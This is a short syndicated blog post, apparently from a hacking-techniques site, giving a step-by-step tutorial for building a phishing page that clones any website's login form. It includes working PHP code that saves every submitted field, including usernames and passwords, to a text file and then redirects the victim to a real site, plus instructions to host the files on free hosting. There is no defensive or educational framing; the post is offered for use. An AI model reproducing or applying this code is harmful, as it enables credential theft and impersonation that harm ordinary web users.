Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

Create Phishing page for any Website


Follow these steps for create phishing page for any Website:-

Step 1:- First of all open the Website in your browser for which you want to create Phishing page.

Step 2:-
 After open of the website copy the source code of website by right click on page and save to any name with “.html” extension.

Step 3:- Now open notepad and paste the below code and change the “http://www.redirectwebsite.com” to the address which you want to redirect the user after entering of user name and password. Pass.txt is our database where the details are stores and save this file to any name with “.php” extension. Suppose we save it as hi.php.
   1:  <?php
   2:  header ('Location: http://www.redirectwebsite.com');
   3:  $handle = fopen("pass.txt", "a");
   4:  foreach($_POST as $variable => $value) {
   5:     fwrite($handle, $variable);
   6:     fwrite($handle, "=");
   7:     fwrite($handle, $value);
   8:     fwrite($handle, "rn");
   9:  }
  10:  fwrite($handle, "rn");
  11:  fclose($handle);
  12:  exit;
  13:  ?>

Step 4:- Open a notepad and save empty notepad to “pass.txt”.

Step 5:- Now Open the Source Code (Saved in step 2) and find the action tag and replace the address with hi.php (the file which we make in step 3) and save the file.

Step 6:- Now we have create three file. Now upload all three files on the the free hosting site.

Step 7:- After upload open the html file and enter fake user details to check this. and open the pass.txt file if you see the entered details here than all thing is done and if not than check all step again.



This post first appeared on Techniques For Hackers, please read the originial post: here

Share the post

Create Phishing page for any Website

×

Subscribe to Techniques For Hackers

Get updates delivered right to your inbox!

Thank you for your subscription

×